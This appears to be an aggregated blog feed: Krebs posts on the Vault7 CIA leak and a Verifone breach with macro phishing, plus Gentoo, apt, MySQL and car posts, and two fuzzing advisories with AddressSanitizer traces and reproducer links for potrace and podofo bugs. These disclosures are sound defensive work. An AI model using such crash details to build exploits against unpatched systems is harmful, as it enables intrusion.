Don’t get me wrong: This is a serious leak of fairly sensitive information. And I sincerely hope Wikileaks decides to work with researchers and vendors to coordinate the patching of flaws leveraged by the as-yet unreleased exploit code archive that apparently accompanies this documentation from the CIA.

But in reading the media coverage of this leak, one might be led to believe that even if you are among the small minority of Americans who have chosen to migrate more of their communications to privacy-enhancing technologies like Signal or WhatsApp, it’s all futility because the CIA can break it anyway.

Perhaps a future cache of documents from this CIA division will change things on this front, but an admittedly cursory examination of these documents indicates that the CIA’s methods for weakening the privacy of these tools all seem to require attackers to first succeed in deeply subverting the security of the mobile device — either through a remote-access vulnerability in the underlying operating system or via physical access to the target’s phone.

As Bloomberg’s tech op-ed writer Leonid Bershidsky notes, the documentation released here shows that these attacks are “not about mass surveillance — something that should bother the vast majority of internet users — but about monitoring specific targets.”

By way of example, Bershidsky points to a tweet yesterday from Open Whisper Systems (the makers of the Signal private messaging app) which observes that, “The CIA/Wikileaks story today is about getting malware onto phones, none of the exploits are in Signal or break Signal Protocol encryption.”

The company went on to say that because more online services are now using end-to-end encryption to prevent prying eyes from reading communications that are intercepted in-transit, intelligence agencies are being pushed “from undetectable mass surveillance to expensive, high-risk, targeted attacks.”

A tweet from Open Whisper Systems, the makers of the popular mobile privacy app Signal.
As limited as some of these exploits appear to be, the methodical approach of the countless CIA researchers who apparently collaborated to unearth these flaws is impressive and speaks to a key problem with most commercial hardware and software today: The vast majority of vendors would rather spend the time and money marketing their products than embark on the costly, frustrating, time-consuming and continuous process of stress-testing their own products and working with a range of researchers to find these types of vulnerabilities before the CIA or other nation-state-level hackers can.

Of course, not every company has a budget of hundreds of millions of dollars just to do basic security research. According to this NBC News report from October 2016, the CIA’s Center for Cyber Intelligence (the alleged source of the documents discussed in this story) has a staff of hundreds and a budget in the hundreds of millions: Documents leaked by NSA whistleblower Edward Snowden indicate the CIA requested $685.4 million for computer network operations in 2013, compared to $1 billion by the U.S. National Security Agency (NSA).

TURNABOUT IS FAIR PLAY?

NBC also reported that the CIA’s Center for Cyber Intelligence was tasked by the Obama administration last year to devise cyber attack strategies in response to Russia’s alleged involvement in the siphoning of emails from Democratic National Committee servers as well as from Hillary Clinton‘s campaign chief John Podesta. Those emails were ultimately published online by Wikileaks last summer.

NBC reported that the “wide-ranging ‘clandestine’ cyber operation designed to harass and ’embarrass’ the Kremlin leadership was being lead by the CIA’s Center for Cyber Intelligence.” Could this attack have been the Kremlin’s response to an action or actions by the CIA’s cyber center? Perhaps time (or future leaks) will tell.

Speaking of the NSA, the Wikileaks dump comes hot on the heels of a similar disclosure by The Shadow Brokers, a hacking group that said it stole malicious software from the Equation Group, a highly-skilled and advanced threat actor that has been closely tied to the NSA.

What’s interesting is this Wikileaks cache includes a longish discussion thread among CIA employees who openly discuss where the NSA erred in allowing experts to tie the NSA’s coders to malware produced by the Equation Group. As someone who spends a great deal of time unmasking cybercriminals who invariably leak their identity and/or location through poor operational security, I was utterly fascinated by this exchange.

BUG BOUNTIES VS BUG STOCKPILES

Many are using this latest deluge from WikiLeaks to reopen the debate over whether there is enough oversight of the CIA’s hacking activities. The New York Times called yesterday’s WikiLeaks disclosure “the latest coup for the antisecrecy organization and a serious blow to the CIA, which uses its hacking abilities to carry out espionage against foreign targets.”

The WikiLeaks scandal also revisits the question of whether the U.S. government should instead of hoarding and stockpiling vulnerabilities be more open and transparent about its findings — or at least work privately with software vendors to get the bugs fixed for the greater good. After all, these advocates argue, the United States is perhaps the most technologically-dependent country on Earth: Surely we have the most to lose when (not if) these exploits get leaked? Wouldn’t it be better and cheaper if everyone who produced software sought to crowdsource the hardening of their products?

On that front, my email inbox was positively peppered Tuesday with emails from organizations that run “bug bounty” programs on behalf of corporations. These programs seek to discourage the “full disclosure” approach — e.g., a researcher releasing exploit code for a previously unknown bug and giving the affected vendor exactly zero days to fix the problem before the public finds out how to exploit it (hence the term “zero-day” exploit).

Rather, the bug bounties encourage security researchers to work closely and discreetly with software vendors to fix security vulnerabilities — sometimes in exchange for monetary reward and sometimes just for public recognition.

Casey Ellis, chief executive officer and founder of bug bounty program Bugcrowd, suggested the CIA WikiLeaks disclosure will help criminal groups and other adversaries, while leaving security teams scrambling.

“In this mix there are the targeted vendors who, before today, were likely unaware of the specific vulnerabilities these exploits were targeting,” Ellis said. “Right now, the security teams are pulling apart the Wikileaks dump, performing technical analysis, assessing and prioritizing the risk to their products and the people who use them, and instructing the engineering teams towards creating patches. The net outcome over the long-term is actually a good thing for Internet security — the vulnerabilities that were exploited by these tools will be patched, and the risk to consumers reduced as a result — but for now we are entering yet another Shadow Brokers, Stuxnet, Flame, Duqu, etc., a period of actively exploitable 0-day bouncing around in the wild.”

Ellis said that — in an ironic way, one could say that Wikileaks, the CIA, and the original exploit authors “have combined to provide the same knowledge as the ‘good old days’ of full disclosure — but with far less control and a great many more side-effects than if the vendors were to take the initiative themselves.”

“This, in part, is why the full disclosure approach evolved into the coordinated disclosure and bug bounty models becoming commonplace today,” Ellis said in a written statement. “Stories like that of Wikileaks today are less and less surprising and to some extent are starting to be normalized. It’s only when the pain of doing nothing exceeds the pain of change that the majority of organizations will shift to an proactive vulnerability discovery strategy and the vulnerabilities exploited by these toolkits — and the risk those vulnerabilities create for the Internet — will become less and less common.”

Many observers — including a number of cybersecurity professional friends of mine — have become somewhat inured to these disclosures, and argue that this is exactly the sort of thing you might expect an agency like the CIA to be doing day in and day out. Omer Schneider, CEO at a startup called CyberX, seems to fall into this camp.

“The main issue here is not that the CIA has its own hacking tools or has a cache of zero-day exploits,” Schneider said. “Most nation-states have similar hacking tools, and they’re being used all the time. What’s surprising is that the general public is still shocked by stories like these. Regardless of the motives for publishing this, our concern is that Vault7 makes it even easier for a crop of new cyber-actors get in the game.”

This almost certainly won’t be the last time KrebsOnSecurity cites this week’s big CIA WikiLeaks trove. But for now I’m interested to hear what you, Dear Readers, found most intriguing about it? Sound off in the comments below.
Top

Payments Giant Verifone Investigating Breach

Postby BrianKrebs via Krebs on Security »

Credit and debit card payments giant Verifone [NYSE: PAY] is investigating a breach of its internal computer networks that appears to have impacted a number of companies running its point-of-sale solutions, according to sources. Verifone says the extent of the breach was limited to its corporate network and that its payment services network was not impacted.

San Jose, Calif.-based Verifone is the largest maker of credit card terminals used in the United States. It sells point-of-sale terminals and services to support the swiping and processing of credit and debit card payments at a variety of businesses, including retailers, taxis, and fuel stations.

On Jan. 23, 2017, Verifone sent an “urgent” email to all company staff and contractors, warning they had 24 hours to change all company passwords.

“We are currently investigating an IT control matter in the Verifone environment,” reads an email memo penned by Steve Horan, Verifone Inc.’s senior vice president and chief information officer. “As a precaution, we are taking immediate steps to improve our controls.”

An internal memo sent Jan. 23, 2017 by Verifone’s chief information officer to all staff and contractors, telling them to change their passwords. The memo also states that Verifone employees would no longer be able to install software at will, apparently something everyone at the company could do prior to this notice.
The internal Verifone memo — a copy of which was obtained by KrebsOnSecurity and is pictured above — also informed employees they would no longer be allowed to install software of any kind on company computers and laptops.

Asked about the breach reports, a Verifone spokesman said the company saw evidence in January 2017 of an intrusion in a “limited portion” of its internal network, but that the breach never impacted its payment services network.

An ad tied to Verifone’s petroleum services point-of-sale offerings.
“In January 2017, Verifone’s information security team saw evidence of a limited cyber intrusion into our corporate network,” Verifone spokesman Andy Payment said. “Our payment services network was not impacted. We immediately began work to determine the type of information targeted and executed appropriate measures in response. We believe today that due to our immediate response, the potential for misuse of information is limited.”

Verifone’s Mr. Payment declined to answer additional questions about the breach, such as how Verifone learned about it and whether the company was initially notified by an outside party. But a source with knowledge of the matter told KrebsOnSecurity.com that the employee alert Verifone sent out on Jan, 23, 2017 was in response to a notification that Verifone received from the credit card companies Visa and Mastercard just days earlier in January.

A spokesperson for Visa declined to comment for this story. MasterCard officials did not respond to requests for comment.

According to my source, the intrusion impacted at least one corner of Verifone’s business: A customer support unit based in Clearwater, Fla. that provides comprehensive payment solutions specifically to gas and petrol stations throughout the United States — including, pay-at-the-pump credit card processing; physical cash registers inside the fuel station store; customer loyalty programs; and remote technical support.

The source said his employer shared with the card brands evidence that a Russian hacking group known for targeting payment providers and hospitality firms had compromised at least a portion of Verifone’s internal network.

The source says Visa and MasterCard were notified that the intruders appeared to have been inside of Verifone’s network since mid-2016. The source noted there is ample evidence the attackers used some of the same toolsets and infrastructure as the cybercrime gang that last year is thought to have hacked into Oracle’s MICROS division, a unit of Oracle that provides point-of-sale solutions to hundreds of thousands of retailers and hospitality firms.

Founded in Hawaii, U.S. in 1981, Verifone now operates in more than 150 countries worldwide and employ nearly 5,000 people globally.

Update, 1:17 p.m. ET: Verifone circled back post-publication with the following update to their statement: “According to the forensic information to-date, the cyber attempt was limited to controllers at approximately two dozen gas stations, and occurred over a short time frame. We believe that no other merchants were targeted and the integrity of our networks and merchants’ payment terminals remain secure and fully operational.”

Sources told KrebsOnSecurity that Verifone commissioned an investigation of the breach from Foregenix Ltd., a digital forensics firm based in the United Kingdom that lists Verifone as a “strategic partner.” Foregenix declined to comment for this story.



ANALYSIS

In the MICROS breach, the intruders used a crimeware-as-a-service network called Carbanak, also known as Anunak. In that incident, the attackers compromised Oracle’s ticketing portal that Oracle uses to help MICROS’s hospitality customers remotely troubleshoot problems with their point-of-sale systems. The attackers reportedly used that access to plant malware on the support server so they could siphon MICROS customer usernames and passwords when those customers logged in to the support site.

Oracle’s very few public statements about that incident made it clear that the attackers were after information that could get them inside the electronic tills run by the company’s customers — not Oracle’s cloud or other service offerings. The company acknowledged that it had “detected and addressed malicious code in certain legacy Micros systems,” and that it had asked all MICROS customers to reset their passwords.

Avivah Litan, a financial fraud and endpoint solutions analyst for Gartner Inc., said the attackers in the Verifone breach probably also were after anything that would allow them to access customer payment terminals.

“The worst thing is the attackers have information on the point-of-sale systems that lets them put backdoors on the devices that can record, store and transmit stolen customer card data,” Litan said. “It sounds like they were after point-of-sale software information, whether the POS designs, the source code, or signing keys. Also, the company says it believes it stopped the breach in time, and that usually means they don’t know if they did. The bottom line is it’s very serious when the Verifone system gets breached.”

Verifone’s Jan. 23 “urgent” alert to its staff and contractors suggested that — prior to the intrusion — all employees were free to install or remove software at will. Litan said such policies are not uncommon and they certainly make it simpler for businesses to get work done, but she cautioned that allowing every user to install software anytime makes it easier for a hacker to do the same across multiple systems after compromising just a single machine inside the network.

“It sounds like [Verifone] found some malware in their network that must have come from an employee desktop because now they’re locking that down,” Litan said. “But the next step for these attackers is lateral movement within the victim’s network. And it’s not just within Verifone’s network at that point, it potentially expands to any connected partner network or through trusted zones.”

Litan said many companies choose to “whitelist” applications that they know and trust, but to block all others. She said the solutions can dramatically bring down the success rate of attacks, but that users tend to resist and dislike being restricted on their work devices.

“Most companies don’t put in whitelists because it’s hard to manage. But that’s hardly an excuse for not doing it. Whitelisting is very effective, it’s just a pain in the neck for users. You have to have a process and policies in place to support whitelisting, but it’s certainly doable. Yes, it’s been beaten in targeted attacks before — where criminals get inside and steal the code-signing keys, but it’s still probably the strongest endpoint security organizations can put in place.”

Verifone would not respond to questions about the duration of the breach in its corporate networks. But if, as sources say, this breach lasted more than six months, that’s an awful long time for an extremely skilled adversary to wander around inside your network undetected. Whether the intruders were able to progress from one segment of Verifone’s network to another would depend much on how segmented Verifone’s network is, as well as the robustness of security surrounding its various corporate divisions and many company acquisitions over the years.

The thieves who hacked Target Corp. in 2013, for example, were able to communicate with virtually all company cash registers and other systems within the company’s network because Target’s internal network resembled a single canoe instead of a massive ship with digital bulkheads throughout the vessel to stop a tiny breach in the hull from sinking the entire ship. Check out this story from Sept. 2015, which looked at the results of a confidential security test Target commissioned just days after the breach (spoiler alert, the testers were able to talk to every Target cash register in all 2,000 stores after remotely commandeering a deli scale at a single Target store).

Curious how a stolen card shop works? Check out this story.
The card associations often require companies that handle credit cards to undergo a third-party security audit, but only if there is evidence that customer card data was compromised. That evidence usually comes in the form of banks reporting a pattern of fraud on customer cards that were all used at a particular merchant during the same time frame. However, those reports come slowly — if at all — and often trickle up to the card brands weeks or months after stolen cards end up for sale in bulk on the cybercrime underground.

Corporate network compromises or the theft of proprietary source code (e.g. the same code that goes on merchant payment devices) generally do not trigger a mandatory third-party investigation by a security firm approved by the card brands, Litan said, although she noted that breaches which can be shown to have a material financial impact on the company need to be disclosed to investors and securities regulators.

“There’s no rule anywhere that says you have to disclose if your software’s source code is stolen, but there should be,” Litan said. “Typically, when a company has a breach of their corporate network you think it might hurt the company, but in a case when the company’s software is stolen and that software is used to transmit credit card data then everyone else is hurt.”

LOW-HANGING FRUIT

Litan said if the attackers who broke into Verifone were indeed targeting payment systems in the filling station business, they were going after the lowest of the low-hanging fruit. The fuel station industry is chock-full of unattended, automated terminals that have special security dispensation from Visa and Mastercard: Fuel station owners have been given more time than almost any other industry to forestall costly security upgrades for new card terminals at gas pumps that are capable of reading more secure chip-enabled credit and debit cards.

The chip cards are an advancement mainly because they are far more difficult and costly for thieves to counterfeit or clone for use in face-to-face transactions — by far the most profitable form of credit card fraud (think gift cards and expensive gaming consoles that can easily be resold for cash).

After years of lagging behind the rest of the world — the United States is the last of the G20 nations to move to chip cards — most U.S. financial institutions are starting to issue chip-based cards to customers. However, many retailers and other card-accepting locations have been slow to accept chip based transactions even though they already have the hardware in place to accept chip cards (this piece attempts to explain the “why” behind that slowness).

In contrast, chip-card readers are still a rarity at fuel pumps in the United States, and Litan said they will continue to be for several years. In December 2016, the card associations announced they were giving fuel station owners until 2020 to migrate to chip-based readers.

Previously, fuel station owners that didn’t meet the October 2017 deadline to have chip-enabled readers at the pump would have been on the hook to absorb 100 percent of the costs of fraud associated with transactions in which the customer presented a chip-based card but was not asked or able to dip the chip. Now that they have another three years to get it done, thieves will continue to attack fuel station dispensers and other unattended terminals with skimmers and by attacking point-of-sale terminal hardware makers, integrators and resellers.

HOW WOULD YOUR EMPLOYER FARE?

My confidential source on this story said the closest public description of the email phishing schemes used by the Russian crime group behind both the MICROS and Verifone hacks comes in a report earlier this year from Trustwave, a security firm that often gets called in to investigate third-party data breaches. In that analysis, Trustwave describes an organized crime gang that routinely sets up phony companies and corresponding fake Web sites to make its targeted email phishing lures appear even more convincing.

A phishing lure used in a malware campaign by the same group that allegedly broke into MICROS and Verifone. Source: Trustwave Grand Mars report.
The messages from this group usually include a Microsoft Office (Word or Excel) document that has been booby-trapped with malicious scripts known as “macros.” Microsoft disables macros by default in recent versions of Office, but poisoned document lures often come with entreaties that prompt recipients to override Microsoft’s warnings and enable them manually.

Trustwave’s report cites two examples of this social engineering; one in which an image file is used to obscure a warning sign (see below), and another in which the cleverly-crafted phishing email was accompanied by a phone call from the fraudsters to walk the recipient through the process of manually overriding the macro security warnings (and in effect to launch the malware on the local network).

According to Trustwave, this Russian hacking group prefers to target companies in the hospitality industry, and is thought to be connected to the breaches at a string of hotel chains, including the card breach at Hyatt that compromised customer credit and debit cards at some 250 hotels in roughly 50 countries throughout much of 2015.

In a common attack, the perpetrators would send a phishing email from a domain associated with a legitimate-looking but fake company that was inquiring about spending a great deal of money bringing many important guests to a specific property on a specific date. The emails are often sent to sales and event managers at these lodging facilities, with instructions for checking the attached (booby-trapped) document for specifics about guest and meeting room requirements.

This phishing lure prompts users to enable macros and then launch the malware by disguising it as a message file. Source: Trustwave.
Top

Handling certificates in Gentoo Linux

Postby Sven Vermeulen via Simplicity is a form of art... »

I recently created a new article on the Gentoo Wiki titled Certificates which talks about how to handle certificate stores on Gentoo Linux. The write-up of the article (which might still change name later, because it does not handle everything about certificates, mostly how to handle certificate stores) was inspired by the observation that I had to adjust the certificate stores of both Chromium and Firefox separately, even though they both use NSS.

Certificates?

Well, when a secure communication is established from a browser to a site (or any other interaction that uses SSL/TLS, but let's stay with the browser example for now) part of the exchange is to ensure that the target site is actually the site it claims to be. Don't want someone else to trick you into giving your e-mail credentials do you?

To establish this, the certificate presented by the remote site is validated (alongside other handshake steps). A certificate contains a public key, as well as information about what the certificate can be used for, and who (or what) the certificate represents. In case of a site, the identification is (or should be) tied to the fully qualified domain name.

Of course, everyone could create a certificate for accounts.google.com and try to trick you into leaving your credentials. So, part of the validation of a certificate is to verify that it is signed by a third party that you trust to only sign certificates that are trustworthy. And to validate this signature, you hence need the certificate of this third party as well.

So, what about this certificate? Well, turns out, this one is also often signed by another certificate, and so on, until you reach the "top" of the certificate tree. This top certificate is called the "root certificate". And because we still have to establish that this certificate is trustworthy, we need another way to accomplish this.

Enter certificate stores

The root certificates of these trusted third parties (well, let us call them "Certificate Authorities" from now onward, because they sometimes will lose your trust) need to be reachable by the browser. The location where they are stored in is (often) called the truststore (a naming that I came across when dealing with Java and which stuck).

So, what I wanted to accomplish was to remove a particular CA certificate from the certificate store. I assumed that, because Chromium and Firefox both use NSS as the library to support their cryptographic uses, they would also both use the store location at ~/.pki/nssdb. That was wrong.

Another assumption I had was that NSS also uses the /etc/pki/nssdb location as a system-wide one. Wrong again (not that NSS doesn't allow this, but it seems that it is very much up to, and often ignored by, the NSS-implementing applications).

Oh, and I also assumed that there wouldn't be a hard-coded list in the application. Yup. Wrong again.

How NSS tracks root CA

Basically, NSS has a hard-coded root CA list inside the libnssckbi.so file. On Gentoo, this file is provided by the dev-libs/nss package. Because it is hard-coded, it seemed like there was little I could do to remove it, yet still through the user interfaces offered by Firefox and Chromium I was able to remove the trust bits from the certificate.

Turns out that Firefox (inside ~/.mozilla/firefox/*.default) and Chromium (inside ~/.pki/nssdb) store the (modified) trust bits for those locations, so that the hardcoded list does not need to be altered if all I want to do was revoke the trust on a specific CA. And it isn't that this hard-coded list is a bad list: Mozilla has a CA Certificate Program which controls the CAs that are accepted inside this store.

Still, I find it sad that the system-wide location (at /etc/pki/nssdb) is not by default used as well (or I have something wrong on my system that makes it so). On a multi-user system, administrators who want to have some control over the certificate stores might need to either use login scripts to manipulate the user certificate stores, or adapt the user files directly currently.
Top

Apt: Writing more data than expected

Postby Sebastian Marsching via Open Source, Physics & Politics »

If apt (apt-get, aptitude, etc.) fails with an error message like

Get:1 http://example.com/ubuntu xenial/main amd64 python-tornado amd64 4.2.1-2~ds+1 [275 kB]
Err:1 http://example.com/ubuntu xenial/main amd64 python-tornado amd64 4.2.1-2~ds+1
  Writing more data than expected (275122 > 275100)

but the file in the repository has the expected size, a caching proxy (e.g. Apt-Cacher-NG) might be at fault. This can happen when the package in the repository has been changed instead of releasing a new package with a new version number. This will typically not happen for the official repositories, but it might happen for third-party repositories.

In this case, there are only two solutions: Bypass the proxy or remove the old file from the proxy's cache. In the case of Apt-Cacher-NG, this can be achived by going to the web interface, checking the “Validate by file name AND file directory (use with care),” and “then validate file contents through checksum (SLOW), also detecting corrupt files,” options and clicking “Start Scan and/or Expiration”. This scan should detect the broken packages, which can then be selected by checking “Tag” next to each package and subsequently deleted by clicking “Delete selected files”.
Top

Improving MySQL out of disk space behaviour

Postby Daniël van Eeden via Daniël's Database Blog »

Running out of disk space is something which, of course, should never happen as we all setup monitoring and alerting and only run well behaved applications. But when it does happen we want things to fail gracefully.

So what happens when mysqld runs out of disk space?
The answer is: It depends
  1. It might start to wait until disk space becomes available.
  2. It might crash intentionally after a 'long semaphore wait'
  3. It might return an error to the client (e.g. 'table full')
  4. It might skip writing to the binlog (see binlog_error_action )
What actually happens might depend on the filesystem and OS.

Fixing the disk space issue can be done by adding more space or cleaning up some space. The later can often be done without help of the administrator of the system.

So I wanted to change the behaviour so that it MySQL wouldn't crash or stop to respond to read queries. And to also make it possible for a user of the system to cleanup data to get back to a normal state.

So I wrote a audit plugin which does this:
  1. The DBA sets the maxdiskusage_minfree variable to a threshold for the minimum amount of MB free.
  2. If the amount of free disk space goes under this threshold:
    1. Allow everything for users with the SUPER privilege
    2. Allow SELECT and DELETE
    3. Disallow INSERT
  3. If the amount of free space goes back to normal: Allow everything again
This works, but only if you delete data and then run optimize table to actually make the free space available for the OS.

Note that DELETE can actually increase disk usage because of binlogs, undo, etc.

The code is available on github: https://github.com/dveeden/mysql_maxdiskusage
Top


potrace: heap-based buffer overflow in bm_readbody_bmp (bitmap_io.c) (incomplete fix for CVE-2016-8698)

Postby ago via agostino's blog »

Description:
potrace is a utility that transforms bitmaps into vector graphics.

A fuzz on 1.14 showed that an overflow previously reported as CVE-2016-8698 was not really fixed. Since there isn’t a public git repository, I uploaded the patch on my ‘poc’ repository on github. The patch was sent from the upstream maintainer, Mr. Peter Selinger.

The complete ASan output:

# potrace $FILE
==7325==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd0 at pc 0x00000051dc51 bp 0x7ffc766b1a30 sp 0x7ffc766b1a28
READ of size 8 at 0x60200000efd0 thread T0
    #0 0x51dc50 in bm_readbody_bmp /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:754:4
    #1 0x51dc50 in bm_read /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:138
    #2 0x510a45 in process_file /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/main.c:1058:9
    #3 0x50dd56 in main /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/main.c:1214:7
    #4 0x7f6c7333e78f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289
    #5 0x419b68 in getenv (/usr/bin/potrace+0x419b68)

0x60200000efd1 is located 0 bytes to the right of 1-byte region [0x60200000efd0,0x60200000efd1)
allocated by thread T0 here:
    #0 0x4d2b25 in calloc /tmp/portage/sys-devel/llvm-3.9.1-r1/work/llvm-3.9.1.src/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:72
    #1 0x519776 in bm_new /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap.h:121:30
    #2 0x519776 in bm_readbody_bmp /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:574
    #3 0x519776 in bm_read /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:138
    #4 0x510a45 in process_file /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/main.c:1058:9
    #5 0x50dd56 in main /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/main.c:1214:7
    #6 0x7f6c7333e78f in __libc_start_main /tmp/portage/sys-libs/glibc-2.23-r3/work/glibc-2.23/csu/../csu/libc-start.c:289

SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/portage/media-gfx/potrace-1.14/work/potrace-1.14/src/bitmap_io.c:754:4 in bm_readbody_bmp
Shadow bytes around the buggy address:
  0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa[01]fa fa fa 04 fa
  0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==7325==ABORTING
Affected version:
1.14

Fixed version:
1.15

Commit fix:
https://github.com/asarubbo/poc/blob/master/00219-potrace-heapoverflow-bm_readbody_bmp-PATCH

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
N/A

Reproducer:
https://github.com/asarubbo/poc/blob/master/00210-potrace-heapoverflow-bm_readbody_bmp

Timeline:
2017-02-26: bug discovered and reported to upstream
2017-02-28: upstream released a patch
2017-03-03: blog post about the issue

Note:
This bug was found with American Fuzzy Lop.

Permalink:
https://blogs.gentoo.org/ago/2017/03/03/potrace-heap-based-buffer-overflow-in-bm_readbody_bmp-bitmap_io-c-incomplete-fix-for-cve-2016-8698
Top


Swapping the side markers on a 2016+ Honda Civic

Postby Zach via The Z-Issue »

Overall, I’ve been quite happy with my 2017 Honda Civic EX-T. However, there are some cosmetic changes that I personally think make a world of difference. One of them is debadging it (or removing the “Civic” emblem from the back). Another area for improvement is to swap out the side markers, which by default (and according to law in most of the United States), is amber in colour. As it is the only area on the car that is that gross yellow/orange colour, I thought that it could be vastly improved by swapping it to either clear or some smoked black look. Initially, I ordered the ASEAN market OEM Honda clear side markers on eBay. However, I decided that on my White Orchid Pearl Civic, “smoked black” may look better, so I ordered them instead. Here’s a before-and-after of it:

Following the great instructions provided by a CivicX forum member, I got started. Though his instructions are spot-on, the procedure for swapping to the non-OEM smoked markers was actually a little easier. Basically, step 4 (cutting the tabs on the socket) was unnecessary. So, a simplified and concise list of the steps required for my particular swap is:

  • Turn the wheels inward to give you more room to access the wheel liner
  • Remove the three screws holding the wheel liner
  • Press on the side marker clip that holds it to the body, whilst simultaneously pushing the marker itself outward away from the body
  • Use a very small flat head screwdriver to depress the tab holding the bulb socket to the harness
  • Swap in a new bulb (if you have one, and I can recommend the Philips 194/T10 white LED bulbs, but realise that since they are white, they will not be “street legal” in many municipalities)
  • Test the polarity once you have inserted the bulb by simply turning on your headlights
  • Place the harness/new bulb/socket into the new side marker (noting that one notch is larger than the rest, which may require rotation of the side marker)
  • Align the new side marker accordingly, and make sure that it snaps into place
The only caveat I found is that the marker on the passenger’s side did not seem to want to snap into place as easily as did the one on the driver’s side. It took a little wiggling, and ultimately required me to press more firmly on the marker itself in order to get it to stay put.

For a process that only took approximately 30 minutes, though, I think that the swap made a world of difference to the overall appearance of the car. I also am happy with my choice to use the white LED bulb, as it shows quite nicely through the smoked lens:

Cheers,
Zach
Top

podofo: NULL pointer dereference in PoDoFo::PdfColorGray::~PdfColorGray (PdfColor.cpp)

Postby ago via agostino's blog »

Description:
podofo is a C++ library to work with the PDF file format.

A fuzz on it discovered a null pointer dereference. The upstream project denies me to open a new ticket. So, I just will forward this on the -users mailing list.

The complete ASan output:

# podofocolor dummy $FILE foo
==5815==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x7f025d243787 bp 0x7ffe33517c50 sp 0x7ffe33517be0 T0)
==5815==The signal is caused by a READ memory access.
==5815==Hint: address points to the zero page.
    #0 0x7f025d243786 in PoDoFo::PdfColorGray::~PdfColorGray() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfColor.cpp:435:1
    #1 0x52c9b2 in GraphicsStack::TGraphicsStackElement::~TGraphicsStackElement() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.h:29:11
    #2 0x52c9b2 in __gnu_cxx::new_allocator::destroy(GraphicsStack::TGraphicsStackElement*) /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/ext/new_allocator.h:133
    #3 0x52c9b2 in std::deque<GraphicsStack::TGraphicsStackElement, std::allocator >::_M_pop_back_aux() /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/deque.tcc:515
    #4 0x52c9b2 in std::deque<GraphicsStack::TGraphicsStackElement, std::allocator >::pop_back() /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_deque.h:1459
    #5 0x52c9b2 in std::stack<GraphicsStack::TGraphicsStackElement, std::deque<GraphicsStack::TGraphicsStackElement, std::allocator > >::pop() /usr/lib/gcc/x86_64-pc-linux-gnu/4.9.3/include/g++-v4/bits/stl_stack.h:218
    #6 0x52c9b2 in GraphicsStack::Pop() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/graphicsstack.cpp:48
    #7 0x522031 in ColorChanger::ReplaceColorsInPage(PoDoFo::PdfCanvas*) /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:190:35
    #8 0x51ed8e in ColorChanger::start() /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/colorchanger.cpp:120:15
    #9 0x51c06d in main /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/tools/podofocolor/podofocolor.cpp:116:12
    #10 0x7f025bd2e61f in __libc_start_main /var/tmp/portage/sys-libs/glibc-2.22-r4/work/glibc-2.22/csu/libc-start.c:289
    #11 0x428718 in _start (/usr/bin/podofocolor+0x428718)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /tmp/portage/app-text/podofo-0.9.4/work/podofo-0.9.4/src/base/PdfColor.cpp:435:1 in PoDoFo::PdfColorGray::~PdfColorGray()
==5815==ABORTING
Affected version:
0.9.4

Fixed version:
N/A

Commit fix:
N/A

Credit:
This bug was discovered by Agostino Sarubbo of Gentoo.

CVE:
CVE-2017-6849

Reproducer:
https://github.com/asarubbo/poc/blob/master/00175-podofo-nullptr-PoDoFo-PdfColorGray-PdfColorGray

Timeline:
2017-02-13: bug discovered
2017-03-02: bug reported to upstream
2017-03-02: blog post about the issue
2017-03-12: CVE assigned
